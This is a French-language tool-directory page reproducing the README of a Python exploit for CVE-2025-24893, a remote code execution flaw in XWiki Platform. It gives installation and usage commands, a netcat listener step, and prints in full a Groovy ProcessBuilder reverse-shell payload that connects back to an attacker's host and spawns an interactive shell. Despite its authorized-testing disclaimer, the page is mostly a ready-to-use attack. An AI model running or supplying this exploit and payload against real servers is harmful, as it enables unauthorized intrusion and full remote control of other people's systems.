Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-24893 — Exploit Python3 pour CVE-2025-24893, une vulnérabilité d'exécution de code à distance dans XWiki Platform. Détecte automatiquement HTTPS/HTTP, construit une charge utile de macro asynchrone Groovy et fournit un shell inverse configurable pour les tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/hackersonsteroids/cve-2025-24893
ExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubhackersonsteroids/cve-2025-24893

cve-2025-24893

Exploit Python3 pour CVE-2025-24893, une vulnérabilité d'exécution de code à distance dans XWiki Platform. Détecte automatiquement HTTPS/HTTP, construit une charge utile de macro asynchrone Groovy et fournit un shell inverse configurable pour les tests de sécurité autorisés.

Voir le dépôt
52il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24893 XWiki RCE Exploit

Exploit Banner

Un simple script Python3 pour exploiter CVE-2025-24893, une vulnérabilité d'exécution de code à distance dans la plateforme XWiki, à l'aide d'une macro asynchrone basée sur Groovy et d'une charge utile de reverse shell configurable.

⚠️ AVERTISSEMENT : Cet outil est fourni uniquement à des fins éducatives et de tests autorisés. Toute utilisation non autorisée sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester est illégale et contraire à l'éthique.


Table des matières

  • Fonctionnalités
  • Prérequis
  • Installation
  • Utilisation
  • Détection et repli de protocole
  • Charge utile du reverse shell
  • Licence
  • Avertissement

Fonctionnalités

  • ✅ Détecte automatiquement si la cible prend en charge HTTPS ou HTTP
  • ✅ Construit un extrait Groovy ProcessBuilder pour éviter les particularités de
Runtime.exec
  • ✅ Encode dans l'URL la charge utile de la macro asynchrone+groovy XWiki
  • ✅ Reverse shell configurable (hôte + port)
  • ✅ Affiche le code de réponse HTTP pour aider à vérifier la livraison

  • Prérequis

    • Python 3.6 ou supérieur
    • Bibliothèque requests
    root@kitploit:~
    pip install requests
    

    Installation

    Clonez ce dépôt :

    root@kitploit:~
    git clone https://github.com/hackersonsteroids/cve-2025-24893.git
    cd cve-2025-24893
    

    Utilisation

    root@kitploit:~
    ./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
    
    • <TARGET_DOMAIN> L'hôte XWiki (par exemple wiki.example.local).

    • <LHOST> L'adresse IP de votre machine d'attaque (là où votre listener est en écoute).

    • <LPORT> Le port de votre listener (entier).


    Exemple

    1. Démarrez un listener sur votre machine :
    root@kitploit:~
    nc -lvnp 4444
    
    1. Lancez l'exploit :
    root@kitploit:~
    ./exploit.py wiki.vulnerable.local 10.0.0.5 4444
    
    1. En cas de succès, consultez votre listener netcat pour obtenir un shell.

    Détection et repli de protocole

    Avant d'envoyer la charge utile, le script :

    1. Essaie https://<TARGET_DOMAIN>
    2. Tente http://<TARGET_DOMAIN> en repli si HTTPS échoue
    3. Se termine si aucun des deux n'est accessible

    Cela permet d'assurer la compatibilité avec les déploiements à protocoles mixtes.


    Charge utile du reverse shell

    Par défaut, le script utilise un one-liner Python3 :

    root@kitploit:~
    new ProcessBuilder(
      ['/bin/bash','-c',
       'python3 -c \'import socket,subprocess,os;'
       's=socket.socket();s.connect(("LHOST",LPORT));'
       'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
       'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
    ).redirectErrorStream(true).start()
    
    • Vous pouvez modifier la fonction build_payload() si vous avez besoin d'un autre shell (par exemple Bash, Perl, PHP, etc.).

    Licence

    Ce projet est distribué sous la licence MIT. Consultez le fichier LICENSE pour plus de détails.


    Avertissement

    Cet outil est conçu uniquement pour les évaluations de sécurité autorisées et à des fins éducatives. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive. Obtenez toujours une autorisation explicite avant de tester tout système cible.

    Télécharger l’outil